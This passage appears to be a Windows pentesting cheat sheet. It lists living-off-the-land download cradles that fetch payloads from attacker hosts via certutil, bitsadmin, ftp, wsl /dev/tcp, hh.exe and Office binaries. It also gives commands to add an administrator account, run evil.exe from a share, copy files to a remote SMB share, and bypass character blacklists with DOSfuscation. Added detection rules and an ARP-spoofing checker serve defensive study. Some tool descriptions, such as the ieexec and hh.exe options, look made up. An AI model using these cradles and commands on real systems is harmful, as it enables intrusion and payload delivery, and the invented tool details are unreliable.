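    """Broadcast and multicast MACs legitimately map to many IPs, so skip them."""
    if mac == "ff-ff-ff-ff-ff-ff":
        return True
    first_octet = int(mac.split("-")[0], 16)
    return bool(first_octet & 0x01)  # I/G bit set means a group (multicast) address


def find_shared_macs(table):
    """List (interface, mac, [ips]) where one unicast MAC answers for several IPs.

    A single MAC claiming the gateway and a workstation is the classic symptom of
    ARP spoofing; proxy ARP or VRRP can produce the same picture legitimately, so
    treat each hit as a lead to verify against the switch's MAC table.
    """
    findings = []
    for iface, entries in table.items():
        by_mac = defaultdict(list)
        for ip, mac, _kind in entries:
            if not is_group_address(mac):
                by_mac[mac].append(ip)
        for mac, ips in sorted(by_mac.items()):
            if len(ips) > 1:
                findings.append((iface, mac, ips))
    return findings


if __name__ == "__main__":
    for iface, mac, ips in find_shared_macs(parse_arp_table(SAMPLE_ARP_OUTPUT)):
        print(f"[{iface}] {mac} is claimed by {len(ips)} addresses: {', '.join(ips)}")
```

On a live host, pipe the real output in with `arp -a > arp.txt` and pass the file contents to parse_arp_table.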

Download

Bitsadmin.exe

bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1

CertReq.exe

CertReq.exe is a command-line tool in Windows that is used to create and submit certificate requests to a certification authority (CA). It is commonly used by system administrators and security professionals for managing certificates in a Windows environment.

Syntax

The basic syntax for using CertReq.exe is as follows:

CertReq [options] [request_file] [output_file]
  • options: Specifies various options for the certificate request.
  • request_file: Specifies the input file that contains the certificate request information.
  • output_file: Specifies the output file where the resulting certificate will be saved.

Examples

Here are some examples of how CertReq.exe can be used:

  1. Generate a certificate request using a template:
CertReq -new -f template.inf -r -p "password" request.req
  2. Submit a certificate request to a CA:
CertReq -submit -config "https://ca.example.com/certsrv" -attrib "CertificateTemplate:WebServer" request.req response.cer
  3. Accept a certificate response and install the certificate:
CertReq -accept -machine response.cer

Conclusion

CertReq.exe is a powerful command-line tool for managing certificates in a Windows environment. It provides various options for creating and submitting certificate requests, as well as accepting and installing certificate responses. System administrators and security professionals can leverage CertReq.exe to streamline the certificate management process and ensure the security of their Windows systems.

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Certutil.exe

Certutil.exe is a Windows command-line utility for working with certificates, certification authorities (CAs) and certificate stores. It offers many functions, including viewing, exporting, importing and verifying certificates, as well as other certificate-related operations. Some commonly used Certutil.exe commands:

  • certutil -viewstore: view the certificates in a certificate store.
  • certutil -addstore: add a certificate to a certificate store.
  • certutil -delstore: delete a certificate from a certificate store.
  • certutil -exportPFX: export a certificate to a PFX file.
  • certutil -importPFX: import a certificate from a PFX file.
  • certutil -verify: verify the validity of a certificate.
  • certutil -dump: display the details of a certificate.

For more Certutil.exe commands and usage, see the official Microsoft documentation.

certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe

Desktopimgdownldr.exe

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Diantz.exe

diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab

Esentutl.exe

Esentutl.exe is a command-line tool for managing and maintaining Extensible Storage Engine (ESE) databases on Windows. ESE is an embedded database engine used by many Windows components, such as Active Directory, Windows Update and Windows Search.

Basic usage

Some commonly used Esentutl.exe commands:

Check database state

esentutl /mh <database_file>

Checks the state of the given database file, including the database version, the state of the log files and whether the database is consistent.

Repair a database

esentutl /p <database_file>

Repairs the given database file. The repair attempts to recover a damaged database file and bring it to a consistent state.

Recover a database

esentutl /r <log_file> /l <log_folder> /d <database_folder> /i

Recovers the database from the log files and the database file backups. The paths of the log file, the log folder and the database folder must be specified.

Back up a database

esentutl /y <database_file> /d <backup_folder>

Creates a backup copy of the database file. The database file and the backup folder must be specified.

Notes

  • Back up the relevant database and log files before using Esentutl.exe.
  • Stop the services and applications that use the database before running repair or recovery operations.
  • Database operations with Esentutl.exe require administrator privileges.

For more details on Esentutl.exe, see the official documentation.

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

Expand.exe

Expand.exe is a Windows command-line utility for decompressing files. It extracts compressed files (such as .cab files) into a specified directory.

Syntax

expand.exe [-r] source destination

Parameters

  • -r: optional; extracts all files in the source folder recursively.

  • source: path of the file to extract.

  • destination: target path for the extracted files.

Example

expand.exe -r C:\archive.cab C:\extracted_files

The example above recursively extracts all files in C:\archive.cab into the C:\extracted_files directory.

expand \\webdav\folder\file.bat c:\ADS\file.bat

Extrac32.exe

Extrac32.exe is a command-line utility in Windows for decompressing files. It extracts .cab files, a common compressed file format.

Syntax

extrac32 [/Y] [/A] [/D] [/L] [/Q] [/R] [/T:folder] [/X] [/Z] source destination

Parameters

  • /Y: do not prompt for confirmation when extracting.
  • /A: extract the files into the specified folder.
  • /D: display detailed progress information while extracting.
  • /L: extract the files into the specified folder without creating the folder.
  • /Q: display no output while extracting.
  • /R: overwrite existing files when extracting.
  • /T:folder: extract the files into the specified folder.
  • /X: do not keep the source path when extracting.
  • /Z: display detailed progress information while extracting.

Example

extrac32 /Y /A /D /R /T:C:\temp /Z C:\archive.cab C:\destination

This command extracts C:\archive.cab into the C:\destination folder, overwriting existing files. Detailed progress information is shown during extraction, and the source file is extracted into the C:\temp folder.

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Findstr.exe

findstr.exe is a command-line tool in Windows for searching files for a given string. It can find specific content in a text file or search several files for matching strings.

Syntax

findstr [/b] [/e] [/l] [/r] [/s] [/i] [/x] [/v] [/n] [/m] [/o] [/p] [/g:File] [/f:File] [/c:String] [/d:DirList] [/a:ColorAttribute] [Strings] [[Drive:][Path] FileName[ ...]]

Parameters

  • /b: match lines that begin with the given string.
  • /e: match lines that end with the given string.
  • /l: treat the search pattern literally rather than as a regular expression.
  • /r: treat the search pattern as a regular expression.
  • /s: search the given directory and its subdirectories recursively.
  • /i: ignore case when matching.
  • /x: match whole lines only, not partial matches.
  • /v: print only the lines that do not match.
  • /n: print the line number before each line.
  • /m: print only the names of the files that contain a match.
  • /o: print the character offset before each match.
  • /p: print only the names of the files that contain a match, without the matching lines.
  • /g:File: read the search strings from the given file.
  • /f:File: read the list of files to search from the given file.
  • /c:String: specify the string to search for.
  • /d:DirList: search the given list of directories.
  • /a:ColorAttribute: set the colour attribute of the output text.

Examples

  • Search a file for lines containing a string:
findstr "search_string" filename.txt
  • Search several files for lines containing a string:
findstr "search_string" file1.txt file2.txt file3.txt
  • Search a directory and its subdirectories recursively:
findstr /s "search_string" C:\path\to\directory
  • Search with a regular expression:
findstr /r "regex_pattern" filename.txt
  • Read the search strings from a file:
findstr /g:search_strings.txt filename.txt
  • Read the list of files to search from a file:
findstr /f:file_list.txt "search_string"
  • Ignore case:
findstr /i "search_string" filename.txt
  • Match only lines beginning with the string:
findstr /b "search_string" filename.txt
  • Match only lines ending with the string:
findstr /e "search_string" filename.txt
  • Print only non-matching lines:
findstr /v "search_string" filename.txt
  • Print line numbers:
findstr /n "search_string" filename.txt
  • Print only the names of files containing a match:
findstr /m "search_string" filename.txt
  • Print the offset before each match:
findstr /o "search_string" filename.txt
  • Print only file names, without the matching lines:
findstr /p "search_string" filename.txt
  • Set the colour attribute of the output:
findstr /a:ColorAttribute "search_string" filename.txt

Notes

  • findstr.exe is case-sensitive by default; use /i to ignore case.
  • findstr.exe supports regular expressions via /r.
  • findstr.exe can search a single text file or several files for a string.
  • findstr.exe can search a directory and its subdirectories recursively.
  • findstr.exe can read the search strings or the file list from a file.
  • findstr.exe can print non-matching lines, line numbers, file names and so on as needed.

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe

Ftp.exe

ftp.exe is a command-line utility in Windows that allows users to transfer files to and from a remote computer using the File Transfer Protocol (FTP). It is a built-in tool that comes with the Windows operating system.

Syntax

The basic syntax for using ftp.exe is as follows:

ftp [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]

Options

Here are some commonly used options with ftp.exe:

  • -v: Enables verbose mode, which displays detailed information about the FTP connection and file transfers.
  • -d: Enables debugging mode, which provides additional information for troubleshooting purposes.
  • -i: Disables interactive mode, which suppresses prompts for user confirmation during file transfers.
  • -n: Suppresses the automatic login feature, allowing the user to manually log in to the FTP server.
  • -g: Disables filename globbing, which prevents wildcard characters from being expanded in file names.
  • -s:filename: Specifies a text file containing FTP commands to be executed automatically.
  • -a: Uses ASCII mode for file transfers, which is suitable for transferring text files.
  • -w:windowsize: Specifies the size of the receive window for data transfers.
  • -A: Enables anonymous FTP login, allowing users to log in without providing a username or password.

Examples

Here are some examples of how to use ftp.exe:

  1. Connect to an FTP server:
ftp example.com
  2. Upload a file to the FTP server:
put filename
  3. Download a file from the FTP server:
get filename
  4. List files and directories on the FTP server:
ls
  5. Change the current directory on the FTP server:
cd directory
  6. Disconnect from the FTP server:
bye

Conclusion

ftp.exe is a useful command-line tool for transferring files to and from remote computers using FTP. By understanding its syntax and options, you can effectively use this utility for various file transfer operations.

cmd.exe /c "@echo open attacker.com 21 >ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

GfxDownloadWrapper.exe

C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

Hh.exe

hh.exe is a Windows executable that is used to launch the Windows Help and Support Center. It is commonly found in the C:\Windows directory.

Usage

To launch the Help and Support Center using hh.exe, open a command prompt and run the following command:

hh.exe helpctr

This will open the Help and Support Center window, where you can search for help topics and access various Windows support resources.

Command-Line Options

hh.exe supports several command-line options that can be used to customize its behavior. Here are some commonly used options:

  • /mapid <mapid>: Opens the specified Help topic directly.
  • /url <URL>: Opens the specified URL in the default browser.
  • /find <text>: Searches for the specified text in the Help content.
  • /index <keyword>: Displays the Help topics that match the specified keyword.
  • /show <window>: Displays the specified window in the Help and Support Center.

For example, to open a specific Help topic with the map ID 1234, you can use the following command:

hh.exe helpctr /mapid 1234

Security Considerations

hh.exe is a legitimate Windows executable and is not inherently malicious. However, like any other executable, it can be abused by attackers to execute arbitrary commands or launch malicious payloads.

To mitigate the risk of abuse, it is important to ensure that hh.exe is only executed from trusted locations and that the command-line options are properly validated. Additionally, keeping the operating system and software up to date with the latest security patches can help prevent potential vulnerabilities from being exploited.

HH.exe http://some.url/script.ps1

Ieexec.exe

ieexec.exe is a command-line utility in Windows that allows you to execute Internet Explorer processes with specific options. It is commonly used by pentesters and hackers to perform various tasks related to web browsing and exploitation.

Usage

The basic syntax of ieexec.exe is as follows:

ieexec.exe [options] [URL]
  • [options]: Specifies the command-line options for ieexec.exe. These options can be used to control the behavior of Internet Explorer processes.
  • [URL]: Specifies the URL of the website to be opened in Internet Explorer.

Examples

Here are some examples of how ieexec.exe can be used:

  1. Open a website in Internet Explorer:
ieexec.exe https://example.com
  2. Open a website in Internet Explorer with specific options:
ieexec.exe --new-window --no-proxy-server https://example.com
  3. Execute JavaScript code in Internet Explorer:
ieexec.exe --script "alert('Hello, world!');"
  4. Take a screenshot of a website in Internet Explorer:
ieexec.exe --screenshot screenshot.png https://example.com

Conclusion

ieexec.exe is a useful tool for pentesters and hackers who need to interact with Internet Explorer processes from the command line. It provides various options for controlling the behavior of Internet Explorer and performing tasks such as opening websites, executing JavaScript code, and taking screenshots.

ieexec.exe http://x.x.x.x:8080/bypass.exe

Makecab.exe

Makecab.exe is a command-line tool in Windows that is used to create cabinet (.cab) files. Cabinet files are compressed archives that can contain multiple files and folders. This tool is commonly used for packaging and compressing files for distribution or installation purposes.

Syntax

makecab [/V[n]] [/D var=value ...] [/L dir] source [destination]

Parameters

  • /V[n]: Specifies the verbosity level of the output. Use /V for normal output and /Vn for more verbose output (where n is a number from 1 to 3).
  • /D var=value: Defines a variable and its value for use in the makecab directive section.
  • /L dir: Specifies the directory where the output files will be placed.
  • source: Specifies the file or files to be compressed.
  • destination: Specifies the name of the cabinet file to be created.

Examples

  1. Compress a single file:
makecab file.txt
  2. Compress multiple files:
makecab file1.txt file2.txt file3.txt
  3. Specify the output directory:
makecab /L C:\Output file.txt
  4. Set verbosity level to 2:
makecab /V2 file.txt

Additional Information

  • The makecab directive section allows you to specify additional instructions for the compression process, such as file attributes, disk names, and more.
  • Cabinet files can be extracted using the expand command or by double-clicking on them in Windows Explorer.

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

MpCmdRun.exe

MpCmdRun.exe is the command-line utility of Windows Defender. It lets users perform Windows Defender operations from the command line, such as scanning files, updating virus definitions and configuring Windows Defender settings. Some commonly used MpCmdRun.exe commands:

  • Scan a file or folder: MpCmdRun.exe -Scan -ScanType 3 -File <path>
  • Full scan: MpCmdRun.exe -Scan -ScanType 2
  • Update virus definitions: MpCmdRun.exe -SignatureUpdate
  • View the scan log: MpCmdRun.exe -GetFiles -ScanType 3 -LogFile <log_file_path>
  • Disable real-time protection: MpCmdRun.exe -DisableRealtimeMonitoring
  • Enable real-time protection: MpCmdRun.exe -EnableRealtimeMonitoring
  • View Windows Defender settings: MpCmdRun.exe -GetFiles -ScanType 3 -LogFile <log_file_path>

Note that running MpCmdRun.exe commands requires administrator privileges.

MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable

Replace.exe

Replace.exe is a command-line tool in Windows that allows you to replace files in a specified directory. It can be useful for various purposes, including replacing system files, modifying configurations, or performing other file-related operations.

Syntax

The syntax for using Replace.exe is as follows:

replace.exe <source_file> <destination_file> [/A] [/P] [/R] [/W]
  • <source_file>: Specifies the file to be copied.
  • <destination_file>: Specifies the location and name of the new file.
  • /A: Adds the file attributes of the source file to the destination file.
  • /P: Prompts for confirmation before replacing an existing file.
  • /R: Replaces read-only files.
  • /W: Waits for you to insert a disk before replacing files.

Examples

Here are some examples of how to use Replace.exe:

  1. Replace a file, prompting for confirmation before overwriting:
replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /P
  2. Replace a file and add the file attributes of the source file to the destination file:
replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /A
  3. Replace a read-only file:
replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /R
  4. Replace a file and wait for disk insertion:
replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /W

Note: Make sure to replace C:\path\to\source\file.txt with the actual path and name of the source file, and C:\path\to\destination\file.txt with the actual path and name of the destination file.

Conclusion

Replace.exe is a powerful command-line tool in Windows that allows you to replace files in a specified directory. By understanding its syntax and options, you can efficiently perform file replacement operations as needed.

replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A

Excel.exe

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

Powerpnt.exe

Powerpnt.exe is the executable file for Microsoft PowerPoint, a popular presentation software. It is commonly found on Windows operating systems.

Usage

To launch PowerPoint using the command prompt, you can use the following command:

powerpnt.exe

This will open the PowerPoint application, allowing you to create, edit, and present slideshows.

Command Line Options

Powerpnt.exe supports various command line options that can be used to perform specific tasks. Here are some commonly used options:

  • /s - Starts PowerPoint in slideshow mode.
  • /n - Starts a new instance of PowerPoint.
  • /f <filename> - Opens the specified file in PowerPoint.
  • /m <macro> - Runs the specified macro when PowerPoint starts.
  • /pt <printername> - Prints the specified file to the specified printer.
  • /p <filename> - Prints the specified file without opening PowerPoint.

Example

To open a PowerPoint file named "presentation.pptx" using the command prompt, you can use the following command:

powerpnt.exe /f presentation.pptx

This will open the "presentation.pptx" file in PowerPoint.

Conclusion

Powerpnt.exe is a useful tool for working with PowerPoint files from the command line. By understanding its command line options, you can automate tasks and perform operations more efficiently.

Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Squirrel.exe

Squirrel.exe is a command-line utility that allows you to interact with the Squirrel framework. It is commonly used by developers to manage and deploy applications built with Squirrel.

Usage

To use Squirrel.exe, open a command prompt and navigate to the directory where the executable is located. Then, you can run various commands to perform different actions.

Install

The install command is used to install an application. It takes the path to the application package as an argument.

squirrel.exe install <path_to_package>

Update

The update command is used to update an installed application. It takes the path to the updated application package as an argument.

squirrel.exe update <path_to_package>

Uninstall

The uninstall command is used to uninstall an application. It takes the application name as an argument.

squirrel.exe uninstall <application_name>

Other Commands

Squirrel.exe also provides other commands for managing applications, such as list, releasify, and clean. You can use the --help flag with any command to get more information about its usage.

Conclusion

Squirrel.exe is a powerful command-line utility for managing applications built with the Squirrel framework. By using the various commands provided, you can easily install, update, and uninstall applications, making it a valuable tool for developers.

squirrel.exe --download [url to package]

Update.exe

Update.exe is a common executable file found in Windows operating systems. It is used to update various software and system components. However, it can also be leveraged by attackers for malicious purposes.

Malicious Use

Attackers can disguise malware or malicious scripts as Update.exe to trick users into running them. This can be done through various methods, such as phishing emails, compromised websites, or social engineering techniques.

Once executed, the malicious Update.exe can perform a wide range of actions, including:

  • Installing additional malware or backdoors on the system.
  • Modifying system settings or configurations.
  • Stealing sensitive information, such as login credentials or personal data.
  • Initiating unauthorized network connections.
  • Exploiting vulnerabilities in the system or other software.

Prevention and Mitigation

To protect against malicious Update.exe files, consider the following preventive measures:

  1. Exercise caution: Be wary of downloading or running any files named Update.exe from untrusted sources.
  2. Keep software up to date: Regularly update your operating system and software applications to patch any vulnerabilities that could be exploited by attackers.
  3. Use reliable security software: Install and maintain reputable antivirus and anti-malware software to detect and block malicious files.
  4. Enable firewalls: Enable and configure firewalls to monitor and control incoming and outgoing network traffic.
  5. Educate users: Train users to be cautious when downloading files or clicking on links, especially from unknown or suspicious sources.

By following these preventive measures, you can reduce the risk of falling victim to malicious Update.exe files and protect your system from potential attacks.

Update.exe --download [url to package]

Winword.exe

winword.exe is the executable file for Microsoft Word, a popular word processing program. It is commonly found on Windows operating systems.

Execution

To execute winword.exe, you can simply type winword in the command prompt and press Enter. This will launch the Microsoft Word application.

winword

Command Line Arguments

winword.exe supports various command line arguments that can be used to perform specific actions or tasks. Here are some commonly used arguments:

  • /n - Opens a new instance of Microsoft Word.
  • /t - Opens a specified file.
  • /m - Executes a specific macro or command.
  • /q - Starts Word without displaying the splash screen.

To use these arguments, you can append them to the winword command. For example, to open a specific file, you can use the /t argument followed by the file path:

winword /t C:\path\to\file.docx

Additional Information

  • winword.exe is typically located in the C:\Program Files\Microsoft Office\root\OfficeXX directory, where XX represents the version number of Microsoft Office installed on the system.
  • It is important to note that winword.exe can be used as a vector for malicious activities, such as executing macros or launching exploits. Therefore, it is crucial to ensure the security of Microsoft Word and its associated files.

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Wsl.exe

wsl.exe is the executable of the Windows Subsystem for Linux (WSL). WSL is a compatibility layer that allows Linux distributions to run on Windows. By running wsl.exe, users can access and use Linux command-line tools and applications from the Windows environment.

Usage

To run WSL on Windows, press Win + R to open the Run dialog, type wsl and press Enter. This starts the default Linux distribution.

To run a specific Linux distribution, use:

wsl -d <distribution>

where <distribution> is the name of the Linux distribution you want to run.

Examples

Some examples of using wsl.exe:

  • Run the default Linux distribution:
wsl
  • Run the Ubuntu distribution:
wsl -d Ubuntu
  • Run the Kali Linux distribution:
wsl -d Kali

Note that wsl.exe only runs on Windows versions that support WSL.

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
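Detection logic covering the download cradles listed in this section (certutil, bitsadmin, MpCmdRun, esentutl, wsl, desktopimgdownldr, hh.exe and the Office binaries), as an added example that is not part of the original page. It runs over constructed process-creation command lines in the shape of Sysmon Event ID 1 / Security 4688 telemetry; the hosts and paths in them are placeholders.

```python
import re

# Constructed sample command lines (not captured from a real host). The hosts
# are TEST-NET-2 addresses and the file names are placeholders.
SAMPLE_EVENTS = [
    "certutil.exe -urlcache -split -f http://198.51.100.7:8000/shell.exe s.exe",
    "certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256",
    "bitsadmin /transfer job1 https://198.51.100.7/payload.exe C:\\Users\\Public\\p.exe",
    "MpCmdRun.exe -DownloadFile -url https://198.51.100.7/a.exe -path C:\\Temp\\a.exe",
    "MpCmdRun.exe -SignatureUpdate",
    "esentutl.exe /y \\\\198.51.100.7\\tools\\adrestore.exe /d C:\\Temp\\a.exe /o",
    "wsl.exe --exec bash -c 'cat < /dev/tcp/198.51.100.7/54 > binary'",
    "cmd.exe /c desktopimgdownldr.exe /lockscreenurl:https://198.51.100.7/x.ext /eventName:desktopimgdownldr",
    "hh.exe http://198.51.100.7/script.ps1",
    "winword.exe \"http://198.51.100.7/TeamsAddinLoader.dll\"",
    "winword.exe C:\\Users\\alice\\Documents\\report.docx",
]

# An http(s) URL or a UNC path: the remote sources the cradles above pull from.
URL = r"(?:https?://|\\\\)[^\s\"']+"

# (rule name, executable name pattern, argument pattern). The executable is
# matched as a whole token (start of line or after a path separator, space or
# quote) so that e.g. "hh" does not fire on unrelated substrings.
RULES = [
    ("certutil url cache download", r"certutil(?:\.exe)?", r"-urlcache\b.*" + URL),
    ("bitsadmin transfer/addfile", r"bitsadmin(?:\.exe)?", r"/(?:transfer|addfile)\b.*" + URL),
    ("Defender MpCmdRun download", r"mpcmdrun(?:\.exe)?", r"-downloadfile\b.*-url\s+" + URL),
    ("esentutl copy from remote", r"esentutl(?:\.exe)?", r"/y\s+\\\\"),
    ("wsl /dev/tcp download", r"wsl(?:\.exe)?", r"/dev/tcp/"),
    ("desktopimgdownldr lockscreenurl", r"desktopimgdownldr(?:\.exe)?", r"/lockscreenurl:" + URL),
    ("hh.exe remote content", r"hh(?:\.exe)?", URL),
    ("Office binary launched with URL", r"(?:winword|excel|powerpnt)(?:\.exe)?", URL),
]

BIN_PREFIX = r"(?:^|[\\/\s\"'])"
BIN_SUFFIX = r"(?=[\s\"']|$)"

COMPILED = [
    (name, re.compile(BIN_PREFIX + binary + BIN_SUFFIX, re.I), re.compile(args, re.I))
    for name, binary, args in RULES
]


def classify(cmdline):
    """Return the names of every download-cradle rule the command line matches."""
    return [name for name, bin_re, args_re in COMPILED
            if bin_re.search(cmdline) and args_re.search(cmdline)]


def scan(events):
    """Return [(cmdline, [rule names])] for each event that matched at least one rule."""
    findings = []
    for cmdline in events:
        hits = classify(cmdline)
        if hits:
            findings.append((cmdline, hits))
    return findings


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits)}: {cmdline}")
```

The benign controls in the sample (certutil -hashfile, MpCmdRun -SignatureUpdate, Word opening a local .docx) stay silent, which is the precision check to keep when adapting these patterns to real telemetry.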

Other

Basic CMD commands for pentesters

渗透测试人员的基本CMD命令

Here you have a list of basic CMD commands that can be useful during a penetration test.

这里有一些在渗透测试过程中可能有用的基本CMD命令列表。

Networking

网络

ipconfig

ipconfig

Displays the IP configuration for all network interfaces on the machine.

显示机器上所有网络接口的IP配置。

ipconfig

netstat

netstat

Displays active network connections and listening ports.

显示活动的网络连接和监听端口。

netstat -ano

nslookup

nslookup

Performs DNS lookup on a specified domain or IP address.

对指定的域名或IP地址执行DNS查找。

nslookup google.com

ping

ping

Sends ICMP Echo Request packets to a specified IP address or domain.

向指定的IP地址或域名发送ICMP Echo请求数据包。

ping google.com

tracert

tracert

Traces the route that packets take to reach a specified IP address or domain.

跟踪数据包到达指定的IP地址或域名的路径。

tracert google.com

System Information

系统信息

systeminfo

systeminfo

Displays detailed configuration information about the machine's hardware and software.

显示有关机器硬件和软件的详细配置信息。

systeminfo

tasklist

tasklist

Displays a list of currently running processes on the machine.

显示机器上当前正在运行的进程列表。

tasklist

net user

net user

Displays a list of user accounts on the machine.

显示机器上的用户账户列表。

net user

net localgroup

net localgroup

Displays a list of local groups on the machine.

显示机器上的本地组列表。

net localgroup

File and Directory Operations

文件和目录操作

dir

dir

Lists the files and directories in the current directory.

列出当前目录中的文件和目录。

dir

cd

cd

Changes the current directory.

更改当前目录。

cd C:\Windows

copy

copy

Copies one or more files from one location to another.

从一个位置复制一个或多个文件到另一个位置。

copy file.txt C:\Temp

move

move

Moves one or more files from one location to another.

从一个位置移动一个或多个文件到另一个位置。

move file.txt C:\Temp

del

del

Deletes one or more files.

删除一个或多个文件。

del file.txt

User and Group Management

用户和组管理

net user

net user

Creates, modifies, or deletes user accounts.

创建、修改或删除用户账户。

net user hacker password123 /add

net localgroup

net localgroup

Creates, modifies, or deletes local groups.

创建、修改或删除本地组。

net localgroup administrators hacker /add

net group

net group

Displays or modifies global groups.

显示或修改全局组。

net group administrators

Service Management

服务管理

sc

sc

Manages services on the machine.

管理机器上的服务。

sc query
sc start servicename
sc stop servicename

Registry Operations

reg query

Displays the values and subkeys of a specified registry key.

```
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
```

reg add

Adds a new registry key or modifies an existing registry key.

```
reg add HKEY_LOCAL_MACHINE\Software\NewKey
```

reg delete

Deletes a registry key and its subkeys.

```
reg delete HKEY_LOCAL_MACHINE\Software\NewKey
```

Task Scheduler

schtasks

Manages scheduled tasks on the machine.

```
schtasks /query
schtasks /create /tn "TaskName" /tr "C:\Temp\script.bat" /sc DAILY /st 12:00
schtasks /delete /tn "TaskName"
```

Event Viewer

eventvwr

Opens the Event Viewer, which displays detailed information about system events.

```
eventvwr
```

Conclusion

These are just a few of the many CMD commands available for Windows. Understanding and using these commands can greatly enhance your effectiveness as a pentester.

```
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list in bare format (paths only)
time #Get current time
date #Get current date
shutdown /r /t 0 #Restart now
type <file> #Cat file

#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Hide
attrib +h file #Set Hidden
attrib -h file #Remove Hidden

#Give full control over a file that you own
icacls <FILE_PATH> /t /grant <USERNAME>:F
icacls <FILE_PATH> /t /remove <USERNAME> #Remove the permission

#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win

#exe2bat to transform exe file in bat file

#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)

# Get error messages from code
net helpmsg 32 #32 is the code in that case
```

Bypass character blacklist

In some cases, when attempting to execute commands on a target system, certain characters may be blacklisted or filtered out. This can make it difficult to execute commands that contain these restricted characters. However, several techniques can be used to bypass character blacklisting and still execute commands.

1. Character Substitution

One method to bypass character blacklisting is to substitute restricted characters with similar-looking characters that are not blacklisted. For example, if the character ; is blacklisted, it can be replaced with a similar-looking character like ; (Greek question mark). This can trick the system into accepting the command without triggering the blacklist.

2. Unicode Encoding

Another technique is to use Unicode encoding to represent restricted characters. This involves converting the restricted character into its Unicode representation and using that in the command. For example, the character ; can be represented as %u003B in Unicode. This can bypass the blacklist because the system may not recognize the Unicode representation as the restricted character.

3. Command Concatenation

If certain characters are blacklisted individually but allowed when combined with other characters, command concatenation can be used. This involves breaking the command into multiple parts and concatenating them using allowed characters. For example, if the characters & and ; are blacklisted individually but allowed when combined as &;, the command can be split into two parts and concatenated using &; to bypass the blacklist.

By employing these techniques, it is possible to bypass character blacklisting and successfully execute commands on a target system. Note, however, that these techniques may not work in every scenario, as the effectiveness of character blacklisting depends on the specific implementation and configuration of the target system.

```
echo %HOMEPATH:~6,-11%   #\
who^ami   #whoami
```
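Added example (not code from the original page): a Python normaliser implementing cmd's `%VAR:~start,len%` substring rules and caret-escape handling, so a detection rule sees `whoami` behind `who^ami` and the `\` behind `%HOMEPATH:~6,-11%`. The `SAMPLE_ENV` value is constructed (18 characters) so the substring yields the `\` shown above.

```python
"""Normalise a cmd.exe command line that hides keywords behind carets (who^ami)
or %VAR:~start,len% substrings.  Added example, not part of the original page."""
import re

# %NAME%, %NAME:~start% or %NAME:~start,len% (the :old=new replace form is left untouched)
_VAR_RE = re.compile(r"%([^%:]+)(?::~(-?\d+)(?:,(-?\d+))?)?%")

def cmd_substring(value, start, length=None):
    """cmd rules: negative start counts from the end; negative len stops that many chars before the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        return value[start:]
    end = start + length if length >= 0 else n + length
    return value[start:end] if end > start else ""

def expand_percent(cmdline, env):
    upper_env = {k.upper(): v for k, v in env.items()}   # variable names are case-insensitive
    def repl(m):
        name, start, length = m.groups()
        value = upper_env.get(name.upper())
        if value is None:
            return m.group(0)        # interactive cmd leaves an unknown %VAR% as literal text
        if start is None:
            return value
        return cmd_substring(value, int(start), None if length is None else int(length))
    return _VAR_RE.sub(repl, cmdline)

def strip_carets(cmdline):
    """Drop escape carets outside double quotes; the escaped character itself stays."""
    out, in_quotes, i = [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == "^" and not in_quotes:
            i += 1
            if i >= len(cmdline):
                break                # a trailing caret only continues the line
            ch = cmdline[i]
        out.append(ch)
        i += 1
    return "".join(out)

def normalize(cmdline, env):
    # cmd expands %variables% (phase 1) before it processes carets (phase 2)
    return strip_carets(expand_percent(cmdline, env))

SAMPLE_ENV = {"HOMEPATH": r"\Users\pentester01"}  # constructed: 18 chars, so ~6,-11 yields "\"
```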

DOSfuscation

Generate an obfuscated CMD command line:

```
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
```

Listen address ACL

